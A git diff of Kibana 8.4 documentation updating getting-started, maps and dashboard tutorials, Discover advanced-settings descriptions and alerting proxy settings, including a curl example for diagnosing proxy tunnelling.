diff --git a/docs/getting-started/images/dashboard_ecommerceRevenueDashboard_7.15.0.png b/docs/getting-started/images/dashboard_ecommerceRevenueDashboard_7.15.0.png
index 5b62832b1d093..7fbc0a9bad411 100644
Binary files a/docs/getting-started/images/dashboard_ecommerceRevenueDashboard_7.15.0.png and b/docs/getting-started/images/dashboard_ecommerceRevenueDashboard_7.15.0.png differ
diff --git a/docs/getting-started/images/dashboard_sampleDataAddFilter_8.4.0.png b/docs/getting-started/images/dashboard_sampleDataAddFilter_8.4.0.png
new file mode 100644
index 0000000000000..4c253d3fc3ac5
Binary files /dev/null and b/docs/getting-started/images/dashboard_sampleDataAddFilter_8.4.0.png differ
diff --git a/docs/getting-started/images/dashboard_sampleDataFilter_7.15.0.png b/docs/getting-started/images/dashboard_sampleDataFilter_7.15.0.png
deleted file mode 100644
index f1f46ab42371a..0000000000000
Binary files a/docs/getting-started/images/dashboard_sampleDataFilter_7.15.0.png and /dev/null differ
diff --git a/docs/getting-started/images/ecommerceTreemap_lens_8.4.0.png b/docs/getting-started/images/ecommerceTreemap_lens_8.4.0.png
new file mode 100644
index 0000000000000..d933ce93de9d1
Binary files /dev/null and b/docs/getting-started/images/ecommerceTreemap_lens_8.4.0.png differ
diff --git a/docs/getting-started/images/kql_discover_8.4.0.png b/docs/getting-started/images/kql_discover_8.4.0.png
new file mode 100644
index 0000000000000..cc0398049013a
Binary files /dev/null and b/docs/getting-started/images/kql_discover_8.4.0.png differ
diff --git a/docs/getting-started/images/sampleDataFilter_dashboard_8.4.0.png b/docs/getting-started/images/sampleDataFilter_dashboard_8.4.0.png
new file mode 100644
index 0000000000000..7b5af0ad39395
Binary files /dev/null and b/docs/getting-started/images/sampleDataFilter_dashboard_8.4.0.png differ
diff --git a/docs/getting-started/images/timeFilter_discover_8.4.0.png b/docs/getting-started/images/timeFilter_discover_8.4.0.png
new file mode 100644
index 0000000000000..73f13ef2b1d9c
Binary files /dev/null and b/docs/getting-started/images/timeFilter_discover_8.4.0.png differ
diff --git a/docs/getting-started/images/tutorial-discover-2.png b/docs/getting-started/images/tutorial-discover-2.png
deleted file mode 100644
index cf217562c37fd..0000000000000
Binary files a/docs/getting-started/images/tutorial-discover-2.png and /dev/null differ
diff --git a/docs/getting-started/images/tutorial-discover-3.png b/docs/getting-started/images/tutorial-discover-3.png
deleted file mode 100644
index 79cf94058bb76..0000000000000
Binary files a/docs/getting-started/images/tutorial-discover-3.png and /dev/null differ
diff --git a/docs/getting-started/images/tutorial-discover-4.png b/docs/getting-started/images/tutorial-discover-4.png
deleted file mode 100644
index 584221e8cfd04..0000000000000
Binary files a/docs/getting-started/images/tutorial-discover-4.png and /dev/null differ
diff --git a/docs/getting-started/images/tutorial-visualization-dropdown.png b/docs/getting-started/images/tutorial-visualization-dropdown.png
deleted file mode 100644
index a069af95ed14a..0000000000000
Binary files a/docs/getting-started/images/tutorial-visualization-dropdown.png and /dev/null differ
diff --git a/docs/getting-started/images/tutorial-visualization-treemap.png b/docs/getting-started/images/tutorial-visualization-treemap.png
deleted file mode 100644
index c6e8db133cb44..0000000000000
Binary files a/docs/getting-started/images/tutorial-visualization-treemap.png and /dev/null differ
diff --git a/docs/getting-started/images/visualizationTypeDropdown_lens_8.4.0.png b/docs/getting-started/images/visualizationTypeDropdown_lens_8.4.0.png
new file mode 100644
index 0000000000000..731327997c59b
Binary files /dev/null and b/docs/getting-started/images/visualizationTypeDropdown_lens_8.4.0.png differ
diff --git a/docs/getting-started/quick-start-guide.asciidoc b/docs/getting-started/quick-start-guide.asciidoc
index 2667729f4b854..bc98fbf5af737 100644
--- a/docs/getting-started/quick-start-guide.asciidoc
+++ b/docs/getting-started/quick-start-guide.asciidoc
@@ -1,13 +1,13 @@
[[get-started]]
== Quick start
-To quickly get up and running with {kib}, set up on Cloud, then add a sample data set that you can explore and analyze.
+To quickly get up and running with {kib}, set up on Cloud, then add a sample data set that you can explore and visualize.
-When you've finished, you'll know how to:
+When you're done, you'll know how to:
* <>
-* <>
+* <>
[float]
=== Required privileges
@@ -26,12 +26,14 @@ include::{docs-root}/shared/cloud/ess-getting-started.asciidoc[]
Sample data sets come with sample visualizations, dashboards, and more to help you explore {kib} before you ingest or add your own data.
-. On the home page, click *Try our sample data*.
+. On the home page, click *Try sample data*.
+
+. Click *Other sample data sets*.
. On the *Sample eCommerce orders* card, click *Add data*.
+
[role="screenshot"]
-image::images/addData_sampleDataCards_7.15.0.png[Add data UI for the sample data sets]
+image::images/addData_sampleDataCards_8.4.0.png[Add data UI for the sample data sets]
[float]
[[explore-the-data]]
@@ -44,7 +46,7 @@ image::images/addData_sampleDataCards_7.15.0.png[Add data UI for the sample data
. Change the <> to *Last 7 days*.
+
[role="screenshot"]
-image::images/tutorial-discover-2.png[Time filter menu with Last 7 days filter configured]
+image::images/timeFilter_discover_8.4.0.png[Time filter menu with Last 7 days filter configured]
. To view the sales orders for women's clothing that are $60 or more, use the <> search field:
+
@@ -52,18 +54,18 @@ image::images/tutorial-discover-2.png[Time filter menu with Last 7 days filter c
products.taxless_price >= 60 and category : Women's Clothing
+
[role="screenshot"]
-image::images/tutorial-discover-4.png[Discover tables that displays only the orders for women's clothing that are $60 or more]
+image::images/kql_discover_8.4.0.png[Discover tables that displays only the orders for women's clothing that are $60 or more]
. To view only the product categories that contain sales orders, hover over the *category* field, then click *+*.
+
[role="screenshot"]
-image::images/tutorial-discover-3.png[Discover table that displays only the product categories that contain orders]
+image::images/availableFields_discover_8.4.0.png[Discover table that displays only the product categories that contain orders]
[float]
[[view-and-analyze-the-data]]
-== View and analyze the data
+== Visualize the data
-A dashboard is a collection of panels that you can use to view and analyze the data. Panels contain visualizations, interactive controls, text, and more.
+A dashboard is a collection of panels that you can use to visualize the data. Panels contain visualizations, interactive controls, text, and more.
. Open the main menu, then click *Dashboard*.
@@ -76,7 +78,7 @@ image::images/dashboard_ecommerceRevenueDashboard_7.15.0.png[The [eCommerce] Rev
[[create-a-visualization]]
=== Create a visualization panel
-Create a treemap panel that shows the top sales regions and manufacturers, then add the panel to the dashboard.
+Create a treemap visualization panel that shows the top sales regions and manufacturers, then add the panel to the dashboard.
. In the toolbar, click *Edit*.
@@ -85,7 +87,7 @@ Create a treemap panel that shows the top sales regions and manufacturers, then
. In the drag-and-drop visualization editor, open the *Visualization type* dropdown, then select *Treemap*.
+
[role="screenshot"]
-image::getting-started/images/tutorial-visualization-dropdown.png[Chart type menu with Treemap selected]
+image::getting-started/images/visualizationTypeDropdown_lens_8.4.0.png[Chart type menu with Treemap selected]
. From the *Available fields* list, drag the following fields to the workspace:
@@ -94,7 +96,7 @@ image::getting-started/images/tutorial-visualization-dropdown.png[Chart type men
* *manufacturer.keyword*
+
[role="screenshot"]
-image::getting-started/images/tutorial-visualization-treemap.png[Treemap that displays Top values of geoip.city_name and Top values or manufacturer.keyword fields]
+image::getting-started/images/ecommerceTreemap_lens_8.4.0.png[Treemap that displays Top values of geoip.city_name and Top values or manufacturer.keyword fields]
. Click *Save and return*.
+
@@ -113,26 +115,32 @@ You can interact with the dashboard data using controls that allow you to apply
. Click *Apply changes*.
+
[role="screenshot"]
-image::images/dashboard_sampleDataFilter_7.15.0.png[The [eCommerce] Revenue Dashboard that shows only the women's clothing data from the Gnomehouse manufacturer]
+image::images/sampleDataFilter_dashboard_8.4.0.png[The [eCommerce] Revenue Dashboard that shows only the women's clothing data from the Gnomehouse manufacturer]
[float]
[[filter-and-query-the-data]]
=== Filter the data
-To view a subset of the data, you can apply filters to the dashboard panels. Apply a filter to view the women's clothing data generated on Wednesday from the Gnomehouse manufacturer.
+To view a subset of the data, you can apply filters to the dashboard data. Apply a filter to view the women's clothing data generated on Wednesday from the Gnomehouse manufacturer.
. Click *Add filter*.
++
+[role="screenshot"]
+image::images/addFilter_dashboard_8.4.0.png[The Add filter action that applies dashboard-level filters]
. From the *Field* dropdown, select *day_of_week*.
. From the *Operator* dropdown, select *is*.
. From the *Value* dropdown, select *Wednesday*.
++
+[role="screenshot"]
+image::images/addFilterOptions_dashboard_8.4.0.png[The Add filter options configured to display only the women's clothing data generated on Wednesday from the Gnomehouse manufacturer]
-. Click *Save*.
+. Click *Add filter*.
+
[role="screenshot"]
-image::images/dashboard_sampleDataAddFilter_7.15.0.png[The [eCommerce] Revenue Dashboard that shows only the women's clothing data generated on Wednesday from the Gnomehouse manufacturer]
+image::images/dashboard_sampleDataAddFilter_8.4.0.png[The [eCommerce] Revenue Dashboard that shows only the women's clothing data generated on Wednesday from the Gnomehouse manufacturer]
[float]
[[quick-start-whats-next]]
@@ -142,6 +150,6 @@ image::images/dashboard_sampleDataAddFilter_7.15.0.png[The [eCommerce] Revenue D
*Explore your own data in Discover.* Ready to learn more about exploring your data in *Discover*? Go to <>.
-*Create a dashboard with your own data.* Ready to learn more about analyzing your data in *Dashboard*? Go to <>.
+*Create a dashboard with your own data.* Ready to learn more about visualizing your data on a *Dashboard*? Go to <>.
*Try out the {ml-features}.* Ready to analyze the sample data sets and generate models for its patterns of behavior? Go to {ml-docs}/ml-getting-started.html[Getting started with {ml}].
diff --git a/docs/management/advanced-options.asciidoc b/docs/management/advanced-options.asciidoc
index c0fdb537aed73..7a1eaae676906 100644
--- a/docs/management/advanced-options.asciidoc
+++ b/docs/management/advanced-options.asciidoc
@@ -286,8 +286,8 @@ in the current data view is used.
The columns that appear by default on the *Discover* page. The default is `_source`.
-[[discover-samplesize]]`discover:sampleSize`::
-The number of rows to show in the *Discover* table.
+[[discover:enableSql]]`discover:enableSql`::
+experimental[] Allows SQL queries for search.
[[discover-max-doc-fields-displayed]]`discover:maxDocFieldsDisplayed`::
Specifies the maximum number of fields to show in the document column of the *Discover* table.
@@ -295,11 +295,14 @@ Specifies the maximum number of fields to show in the document column of the *Di
[[discover-modify-columns-on-switch]]`discover:modifyColumnsOnSwitch`::
When enabled, removes the columns that are not in the new data view.
-[[discover-sample-size]]`discover:sampleSize`::
-Specifies the number of rows to display in the *Discover* table.
+[[discover-row-height-option]]`discover:rowHeightOption`::
+The number of lines to allow in a row. A value of -1 automatically adjusts the row height to fit the contents. A value of 0 displays the content in a single line.
[[discover-sampleRowsPerPage]]`discover:sampleRowsPerPage`::
-Specifies the number of rows to display per page in the *Discover* table.
+Limits the number of rows per page in the document table.
+
+[[discover-sample-size]]`discover:sampleSize`::
+Sets the maximum number of rows for the entire document table. This is the maximum number of documents fetched from {es}.
[[discover-searchFieldsFromSource]]`discover:searchFieldsFromSource`::
Load fields from the original JSON {ref}/mapping-source-field.html[`_source`].
@@ -310,8 +313,12 @@ When disabled, *Discover* loads fields using the {es} search API's
Controls whether a search is executed when *Discover* first loads. This setting does not have an effect when loading a saved search.
+[[discover:showFieldStatistics]]`discover:showFieldStatistics`::
+beta[] Enables the Field statistics view. Examine details such as
+the minimum and maximum values of a numeric field or a map of a geo field.
+
[[discover:showMultiFields]]`discover:showMultiFields`::
-When enabled, displays multi-fields in the expanded document view.
+Controls the display of multi-fields in the expanded document view.
[[discover-sort-defaultorder]]`discover:sort:defaultOrder`::
The default sort direction for time-based data views.
@@ -319,9 +326,6 @@ The default sort direction for time-based data views. [[doctable-hidetimecolumn]]`doc_table:hideTimeColumn`:: Hides the "Time" column in *Discover* and in all saved searches on dashboards. -[[discover:enableSql]]`discover:enableSql`:: -When enabled, allows SQL queries for search. - [[doctable-highlight]]`doc_table:highlight`:: Highlights results in *Discover* and saved searches on dashboards. Highlighting slows requests when working on big documents. @@ -331,6 +335,10 @@ Controls the way the document table looks and works. To use the new *Document Explorer* instead of the classic view, turn off this option. The *Document Explorer* offers better data sorting, resizable columns, and a full screen view. +[[truncate-max-height]]`truncate:maxHeight`:: +The maximum height that a cell in a table can occupy. To disable truncation, set to 0. + + [float] [[kibana-ml-settings]] ==== Machine Learning @@ -448,9 +456,8 @@ Includes {ref}/frozen-indices.html[frozen indices] in results. Searching through frozen indices might increase the search time. This setting is off by default. Users must opt-in to include frozen indices. -[[search-timeout]]`search:timeout`:: Change the maximum timeout for a search -session or set to 0 to disable the timeout and allow queries to run to -completion. +[[search-timeout]]`search:timeout`:: Change the maximum timeout, in milliseconds (ms), for a search +session. To disable the timeout and allow queries to run to completion, set to 0. The default is 600,000 ms, or 10 minutes. [float] [[kibana-siem-settings]] diff --git a/docs/maps/images/gs-filter-icon.png b/docs/maps/images/gs-filter-icon.png new file mode 100644 index 0000000000000..aebe2d51873fd Binary files /dev/null and b/docs/maps/images/gs-filter-icon.png differ 
diff --git a/docs/maps/images/gs_add_cloropeth_layer.png b/docs/maps/images/gs_add_cloropeth_layer.png
index 10774c69adbba..63dc1e3db2cfe 100644
Binary files a/docs/maps/images/gs_add_cloropeth_layer.png and b/docs/maps/images/gs_add_cloropeth_layer.png differ
diff --git a/docs/maps/images/gs_add_es_document_layer.png b/docs/maps/images/gs_add_es_document_layer.png
index 4656933552f26..35a9192634edc 100644
Binary files a/docs/maps/images/gs_add_es_document_layer.png and b/docs/maps/images/gs_add_es_document_layer.png differ
diff --git a/docs/maps/images/gs_dashboard_with_map.png b/docs/maps/images/gs_dashboard_with_map.png
index b7d4a7b63ed30..81fc181e698e9 100644
Binary files a/docs/maps/images/gs_dashboard_with_map.png and b/docs/maps/images/gs_dashboard_with_map.png differ
diff --git a/docs/maps/images/gs_map_filtered.png b/docs/maps/images/gs_map_filtered.png
new file mode 100644
index 0000000000000..f69b2e7397d57
Binary files /dev/null and b/docs/maps/images/gs_map_filtered.png differ
diff --git a/docs/maps/images/gs_tooltip_filter.png b/docs/maps/images/gs_tooltip_filter.png
new file mode 100644
index 0000000000000..3de04f846c8ae
Binary files /dev/null and b/docs/maps/images/gs_tooltip_filter.png differ
diff --git a/docs/maps/images/sample_data_web_logs.png b/docs/maps/images/sample_data_web_logs.png
index 76ff9c0d16221..080824cf47687 100644
Binary files a/docs/maps/images/sample_data_web_logs.png and b/docs/maps/images/sample_data_web_logs.png differ
diff --git a/docs/maps/maps-getting-started.asciidoc b/docs/maps/maps-getting-started.asciidoc
index d4da7ef8aae2e..317a9657f1965 100644
--- a/docs/maps/maps-getting-started.asciidoc
+++ b/docs/maps/maps-getting-started.asciidoc
@@ -34,7 +34,7 @@ refer to <>. . Open the main menu, and then click *Dashboard*. . Click **Create dashboard**. . Set the time range to *Last 7 days*. -. Click the **Create new Maps** icon image:maps/images/app_gis_icon.png[] +. Click the **Create new Maps** icon image:maps/images/app_gis_icon.png[]. [float] [[maps-add-choropleth-layer]] @@ -46,7 +46,7 @@ and lighter shades will symbolize countries with less traffic. . Click **Add layer**, and then click **Choropleth**. -. From the **Layer** dropdown menu, select **World Countries**. +. From the **EMS boundaries** dropdown menu, select **World Countries**. . In **Statistics source**, set: ** **Data view** to **kibana_sample_data_logs** @@ -62,12 +62,12 @@ and lighter shades will symbolize countries with less traffic. . Add a Tooltip field: ** **ISO 3166-1 alpha-2 code** is added by default. -** Click **+ Add** to open field select. +** Click **+ Add** to open the field select. ** Select **name** and click *Add*. . In **Layer style**: -** Set **Fill color: As number** to the grey color ramp. +** Set **Fill color > As number** to the grey color ramp. ** Set **Border color** to white. ** Under **Label**, change **By value** to **Fixed**. @@ -76,7 +76,7 @@ and lighter shades will symbolize countries with less traffic. Your map now looks like this: + [role="screenshot"] -image::maps/images/gs_add_cloropeth_layer.png[] +image::maps/images/gs_add_cloropeth_layer.png[Map showing the Total Requests by Destination layer] [float] [[maps-add-elasticsearch-layer]] @@ -107,7 +107,7 @@ The layer is only visible when users zoom in. . Add a tooltip field and select **agent**, **bytes**, **clientip**, **host**, **machine.os**, **request**, **response**, and **timestamp**. -. In **Scaling**, set *Limits results to 10,000.* +. In **Scaling**, enable *Limit results to 10,000.* . In **Layer style**, set **Fill color** to **#2200FF**. 
@@ -116,7 +116,7 @@ The layer is only visible when users zoom in. Your map will look like this from zoom level 9 to 24: + [role="screenshot"] -image::maps/images/gs_add_es_document_layer.png[] +image::maps/images/gs_add_es_document_layer.png[Map showing what zoom level looks like a level 9] [float] ==== Add a layer for aggregated data @@ -140,14 +140,14 @@ grids with less bytes transferred. ** Click **Add metric**. ** Set **Aggregation** to **Sum** with **Field** set to **bytes**. . In **Layer style**, change **Symbol size**: -** Set the field select to *sum bytes*. +** Set *By value* to *sum bytes*. ** Set the min size to 7 and the max size to 25 px. . Click **Save & close** button. + Your map will look like this between zoom levels 0 and 9: + [role="screenshot"] -image::maps/images/sample_data_web_logs.png[] +image::maps/images/sample_data_web_logs.png[Map showing what zoom level 3 looks like] [float] [[maps-save]] @@ -164,10 +164,10 @@ View your geospatial data alongside a heat map and pie chart, and then filter th When you apply a filter in one panel, it is applied to all panels on the dashboard. . Click **Add from library** to open a list of panels that you can add to the dashboard. -. Add **[Logs] Unique Visitor Heatmap** and **[Logs] Bytes distribution** to the dashboard. +. Add **[Logs] Unique Destination Heatmap** and **[Logs] Bytes distribution** to the dashboard. + [role="screenshot"] -image::maps/images/gs_dashboard_with_map.png[] +image::maps/images/gs_dashboard_with_map.png[Map in a dashboard with 2 other panels] . To filter for documents with unusually high byte values, click and drag in the *Bytes distribution* chart. 
@@ -177,10 +177,15 @@ image::maps/images/gs_dashboard_with_map.png[] .. Open a tooltip by clicking anywhere in the United States vector. -.. To show only documents where **geo.src** is **US**, click the filter icon in the row for **ISO 3066-1 alpha-2**. +.. To show only documents where **geo.src** is **US**, click the filter icon image:maps/images/gs-filter-icon.png[filter icon, width=24px]in the row for **ISO 3066-1 alpha-2**. ++ +[role="screenshot"] +image::maps/images/gs_tooltip_filter.png[Tooltip on map, width=75%] ++ +Your filtered map should look similar to this: + [role="screenshot"] -image::maps/images/gs_dashboard_with_terms_filter.png[] +image::maps/images/gs_map_filtered.png[Map showing filtered data] [float] === What's next? diff --git a/docs/settings/alert-action-settings.asciidoc b/docs/settings/alert-action-settings.asciidoc index 95003a08b7b09..014ee4e69dca1 100644 --- a/docs/settings/alert-action-settings.asciidoc +++ b/docs/settings/alert-action-settings.asciidoc 
@@ -143,6 +143,22 @@ Specifies preconfigured connector IDs and configs. Default: {}. `xpack.actions.proxyUrl` {ess-icon}:: Specifies the proxy URL to use, if using a proxy for actions. By default, no proxy is used. ++ +Proxies may be used to proxy http or https requests through a proxy using the http or https protocol. Kibana only uses proxies in "CONNECT" mode (sometimes referred to as "tunneling" TCP mode, compared to HTTP mode). That is, Kibana will always make requests through a proxy using the HTTP `CONNECT` method. ++ +If your proxy is using the https protocol (vs the http protocol), the setting `xpack.actions.ssl.proxyVerificationMode: none` will likely be needed, unless your proxy's certificates are signed using a publicly available certificate authority. ++ +There is currently no support for using basic authentication with a proxy (authentication for the proxy itself, not the URL being requested through the proxy). ++ +To help diagnose problems using a proxy, you can use the `curl` command with options to use your proxy, and log debug information, with the following command, replacing the proxy and target URLs as appropriate. This will force the request to be made to the +proxy in tunneling mode, and display some of the interaction between the client and the proxy. ++ +[source,sh] +-- +curl --verbose --proxytunnel --proxy http://localhost:8080 http://example.com +-- ++ + `xpack.actions.proxyBypassHosts` {ess-icon}:: Specifies hostnames which should not use the proxy, if using a proxy for actions. The value is an array of hostnames as strings. By default, all hosts will use the proxy, but if an action's hostname is in this list, the proxy will not be used. The settings `xpack.actions.proxyBypassHosts` and `xpack.actions.proxyOnlyHosts` cannot be used at the same time. 
@@ -210,6 +226,9 @@ Specifies the behavior when a new or changed rule has a schedule interval less t `xpack.alerting.rules.run.actions.max` {ess-icon}:: Specifies the maximum number of actions that a rule can generate each time detection checks run. +`xpack.alerting.rules.run.alerts.max` {ess-icon}:: +Specifies the maximum number of alerts that a rule can generate each time detection checks run. Default: 1000. + `xpack.alerting.rules.run.timeout` {ess-icon}:: Specifies the default timeout for tasks associated with all types of rules. The time is formatted as: + diff --git a/docs/user/dashboard/aggregation-based.asciidoc b/docs/user/dashboard/aggregation-based.asciidoc index 842f2e93bc58e..4ca251b3a1936 100644 --- a/docs/user/dashboard/aggregation-based.asciidoc +++ b/docs/user/dashboard/aggregation-based.asciidoc @@ -140,9 +140,11 @@ a bar chart that displays the top five log traffic sources for every three hours Add the sample web logs data that you'll use to create the bar chart, then create the dashboard. -. From the *Home* page, click *Try our sample data*. +. On the home page, click *Try sample data*. -. From *Sample web logs*, click *Add data*. +. Click *Other sample data sets*. + +. On the *Sample web logs* card, click *Add data*. . Open the main menu, then click *Dashboard*. @@ -153,9 +155,9 @@ Add the sample web logs data that you'll use to create the bar chart, then creat Open the *Aggregation based* editor and change the time range. -. On the dashboard, click *All types > Aggregation based*, select *Vertical bar*, then select *kibana_sample_data_logs*. +. On the dashboard, click *All types > Aggregation based*, select *Vertical bar*, then select *Kibana Sample Data Logs*. -. Make sure the <>> is *Last 7 days*. +. Make sure the <> is *Last 7 days*. [float] [[tutorial-configure-the-bar-chart]] 
@@ -172,7 +174,7 @@ To create the bar chart, add a <>, then .. Click *Update*. + [role="screenshot"] -image:images/aggBased_barChartTutorial1_8.3.png[Bar chart with sample logs data] +image:images/aggBased_barChartTutorial1_8.4.png[Bar chart with sample logs data] . To show the top five log traffic sources, add a sub-bucket aggregation. @@ -187,7 +189,7 @@ TIP: Aggregation-based panels support a maximum of three *Split series*. .. Click *Update*. + [role="screenshot"] -image:images/aggBased_barChartTutorial2_8.3.png[Bar chart with sample logs data] +image:images/aggBased_barChartTutorial2_8.4.png[Bar chart with sample logs data] [float] [[save-the-aggregation-based-panel]] diff --git a/docs/user/dashboard/images/aggBased_barChartTutorial1_8.3.png b/docs/user/dashboard/images/aggBased_barChartTutorial1_8.3.png deleted file mode 100644 index a30fe3fbd1b78..0000000000000 Binary files a/docs/user/dashboard/images/aggBased_barChartTutorial1_8.3.png and /dev/null differ diff --git a/docs/user/dashboard/images/aggBased_barChartTutorial1_8.4.png b/docs/user/dashboard/images/aggBased_barChartTutorial1_8.4.png new file mode 100644 index 0000000000000..9e43d6e61a656 Binary files /dev/null and b/docs/user/dashboard/images/aggBased_barChartTutorial1_8.4.png differ diff --git a/docs/user/dashboard/images/aggBased_barChartTutorial2_8.3.png b/docs/user/dashboard/images/aggBased_barChartTutorial2_8.3.png deleted file mode 100644 index d1d7f0644db31..0000000000000 Binary files a/docs/user/dashboard/images/aggBased_barChartTutorial2_8.3.png and /dev/null differ diff --git a/docs/user/dashboard/images/aggBased_barChartTutorial2_8.4.png b/docs/user/dashboard/images/aggBased_barChartTutorial2_8.4.png new file mode 100644 index 0000000000000..ea6727c0ca47d Binary files /dev/null and b/docs/user/dashboard/images/aggBased_barChartTutorial2_8.4.png differ 
diff --git a/docs/user/dashboard/images/lens_dataViewDropDown_8.0.png b/docs/user/dashboard/images/lens_dataViewDropDown_8.0.png
deleted file mode 100644
index 309e1be49b9db..0000000000000
Binary files a/docs/user/dashboard/images/lens_dataViewDropDown_8.0.png and /dev/null differ
diff --git a/docs/user/dashboard/images/lens_dataViewDropDown_8.3.png b/docs/user/dashboard/images/lens_dataViewDropDown_8.3.png
deleted file mode 100644
index 857f28303b8cb..0000000000000
Binary files a/docs/user/dashboard/images/lens_dataViewDropDown_8.3.png and /dev/null differ
diff --git a/docs/user/dashboard/images/lens_dataViewDropDown_8.4.0.png b/docs/user/dashboard/images/lens_dataViewDropDown_8.4.0.png
new file mode 100644
index 0000000000000..990cebfc51f6f
Binary files /dev/null and b/docs/user/dashboard/images/lens_dataViewDropDown_8.4.0.png differ
diff --git a/docs/user/dashboard/images/lens_lineChartMetricOverTime_8.4.0.png b/docs/user/dashboard/images/lens_lineChartMetricOverTime_8.4.0.png
new file mode 100644
index 0000000000000..9ed9b4730fae4
Binary files /dev/null and b/docs/user/dashboard/images/lens_lineChartMetricOverTime_8.4.0.png differ
diff --git a/docs/user/dashboard/images/lens_logsDashboard_7.16.png b/docs/user/dashboard/images/lens_logsDashboard_7.16.png
deleted file mode 100644
index cdfe0accdbbb5..0000000000000
Binary files a/docs/user/dashboard/images/lens_logsDashboard_7.16.png and /dev/null differ
diff --git a/docs/user/dashboard/images/lens_logsDashboard_8.3.png b/docs/user/dashboard/images/lens_logsDashboard_8.3.png
deleted file mode 100644
index 089fd5dcadb0c..0000000000000
Binary files a/docs/user/dashboard/images/lens_logsDashboard_8.3.png and /dev/null differ
diff --git a/docs/user/dashboard/images/lens_logsDashboard_8.4.0.png b/docs/user/dashboard/images/lens_logsDashboard_8.4.0.png
new file mode 100644
index 0000000000000..1801fea4e0620
Binary files /dev/null and b/docs/user/dashboard/images/lens_logsDashboard_8.4.0.png differ
diff --git a/docs/user/dashboard/images/lens_metricUniqueCountOfClientip_7.16.png b/docs/user/dashboard/images/lens_metricUniqueCountOfClientip_7.16.png
deleted file mode 100644
index bed6acf501a3a..0000000000000
Binary files a/docs/user/dashboard/images/lens_metricUniqueCountOfClientip_7.16.png and /dev/null differ
diff --git a/docs/user/dashboard/images/lens_metricUniqueCountOfClientip_8.4.0.png b/docs/user/dashboard/images/lens_metricUniqueCountOfClientip_8.4.0.png
new file mode 100644
index 0000000000000..f3b1603b50bef
Binary files /dev/null and b/docs/user/dashboard/images/lens_metricUniqueCountOfClientip_8.4.0.png differ
diff --git a/docs/user/dashboard/images/lens_pieChartCompareSubsetOfDocs_7.16.png b/docs/user/dashboard/images/lens_pieChartCompareSubsetOfDocs_7.16.png
index f8e8ba98f691e..fdeca77da25fb 100644
Binary files a/docs/user/dashboard/images/lens_pieChartCompareSubsetOfDocs_7.16.png and b/docs/user/dashboard/images/lens_pieChartCompareSubsetOfDocs_7.16.png differ
diff --git a/docs/user/dashboard/images/lens_visualizationTypeDropdown_8.0.png b/docs/user/dashboard/images/lens_visualizationTypeDropdown_8.0.png
deleted file mode 100644
index 3a7cc44b820ee..0000000000000
Binary files a/docs/user/dashboard/images/lens_visualizationTypeDropdown_8.0.png and /dev/null differ
diff --git a/docs/user/dashboard/images/lens_visualizationTypeDropdown_8.4.0.png b/docs/user/dashboard/images/lens_visualizationTypeDropdown_8.4.0.png
new file mode 100644
index 0000000000000..a86dbed105eff
Binary files /dev/null and b/docs/user/dashboard/images/lens_visualizationTypeDropdown_8.4.0.png differ
diff --git a/docs/user/dashboard/lens-advanced.asciidoc b/docs/user/dashboard/lens-advanced.asciidoc
index 68516b49d2158..04822444c530e 100644
--- a/docs/user/dashboard/lens-advanced.asciidoc
+++ b/docs/user/dashboard/lens-advanced.asciidoc
@@ -16,7 +16,9 @@ Before you begin, you should be familiar with the <>. Add the sample ecommerce data, and create and set up the dashboard. -. Go to the *Home* page, then click *Try sample data*. +. On the home page, click *Try sample data*. + +. Click *Other sample data sets*. . On the *Sample eCommerce orders* card, click *Add data*. diff --git a/docs/user/dashboard/lens.asciidoc b/docs/user/dashboard/lens.asciidoc index 8e8ffe902a565..80e1665753c15 100644 --- a/docs/user/dashboard/lens.asciidoc +++ b/docs/user/dashboard/lens.asciidoc @@ -73,7 +73,7 @@ Change the fields list to display a different {data-source}, different time rang * To add fields, open the {data-source} dropdown, then select *Add a field to this {data-source}*. + [role="screenshot"] -image:images/lens_dataViewDropDown_8.3.png[Dropdown menu located next to {data-source} field with items for adding and managing fields] +image:images/lens_dataViewDropDown_8.4.0.png[Dropdown menu located next to {data-source} field with items for adding and managing fields] + For more information about adding fields to {data-sources} and examples, refer to <>. diff --git a/docs/user/dashboard/tutorial-create-a-dashboard-of-lens-panels.asciidoc b/docs/user/dashboard/tutorial-create-a-dashboard-of-lens-panels.asciidoc index 1d4d5d70e879e..95f937bb65443 100644 --- a/docs/user/dashboard/tutorial-create-a-dashboard-of-lens-panels.asciidoc +++ b/docs/user/dashboard/tutorial-create-a-dashboard-of-lens-panels.asciidoc @@ -8,7 +8,7 @@ at website logs, but this type of dashboard works on any type of data. When you're done, you'll have a complete overview of the sample web logs data. [role="screenshot"] -image::images/lens_logsDashboard_8.3.png[Logs dashboard] +image::images/lens_logsDashboard_8.4.0.png[Logs dashboard] Before you begin, you should be familiar with the <>. 
@@ -18,7 +18,9 @@ Before you begin, you should be familiar with the <>. Add the sample web logs data, and create and set up the dashboard. -. Go to the *Home* page, then click *Try sample data*. +. On the home page, click *Try sample data*. + +. Click *Other sample data sets*. . On the *Sample web logs* card, click *Add data*. @@ -38,10 +40,10 @@ Open the visualization editor, then make sure the correct fields appear. . On the dashboard, click *Create visualization*. -. Make sure the *kibana_sample_data_logs* data view appears. +. Make sure the *{kib} Sample Data Logs* {data-source} appears. + [role="screenshot"] -image::images/lens_dataViewDropDown_8.3.png[Data view dropdown] +image::images/lens_dataViewDropDown_8.4.0.png[Data view dropdown] To create the visualizations in this tutorial, you'll use the following fields: @@ -68,12 +70,12 @@ The only number function that you can use with *clientip* is *Unique count*, als . Open the *Visualization type* dropdown, then select *Metric*. + [role="screenshot"] -image::images/lens_visualizationTypeDropdown_8.0.png[Visualization type dropdown] +image::images/lens_visualizationTypeDropdown_8.4.0.png[Visualization type dropdown] . From the *Available fields* list, drag *clientip* to the workspace or layer pane. + [role="screenshot"] -image::images/lens_metricUniqueCountOfClientip_7.16.png[Metric visualization of the clientip field] +image::images/lens_metricUniqueCountOfClientip_8.4.0.png[Metric visualization of the clientip field] + In the layer pane, *Unique count of clientip* appears because the editor automatically applies the *Unique count* function to the *clientip* field. *Unique count* is the only numeric function that works with IP addresses. 
